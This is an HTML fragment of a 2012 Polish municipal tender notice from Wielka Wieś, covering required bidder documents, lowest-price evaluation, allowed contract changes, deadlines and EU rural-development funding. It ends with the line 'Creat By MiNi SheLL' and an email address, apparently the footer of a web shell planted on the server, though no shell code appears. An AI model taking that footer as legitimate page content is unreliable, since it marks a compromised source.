<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz OFERTA - załącznik nr 1 do SIWZ.
Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika 
z innych dokumentów dołączonych do oferty.
Oświadczenia i dokumenty wymagane postanowieniami rozdziału VIII SIWZ.
Kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu:Inwestor  dopuszcza możliwość zmiany terminu  tylko w przypadku wystąpienia okoliczności nie wynikłych z winy Wykonawcy w tym m.in.:
a)wystąpienia warunków atmosferycznych uniemożliwiających realizację robót 
b) wystąpienia zmian parametrów projektowych opisanych w SIWZ dla wykonywanego obiektu.
c)wystąpienia konieczności wykonania robót nie przewidzianych .
Termin wykonania zamówienia zostanie przesunięty odpowiednio o czas:
a) wstrzymania robót ze względu na warunki atmosferyczne
b) niezbędny do wprowadzenia zmian do projektu
c) niezbędny do wykonania robót nie przewidzianych.
Zmiana terminu powinna być potwierdzona protokołem konieczności zaakceptowanym przez Zamawiającego i podpisana przez Zamawiającego i Wykonawcę.
Zmiana wynagrodzenia: Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
a) ustawowej  zmiany stawki podatku VAT
b) wprowadzonych przez Zamawiającego w trakcie realizacji przedmiotu umowy zmian dotyczących technologii wykonania
c) w przypadku nie wykorzystania w całości kwoty umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. wesoła 48, 32-089 Wielka Wieś, pok. 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. wesoła 48, 32-089 Wielka Wieś, Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007- 2013;oś,3 Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, działanie 321, Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com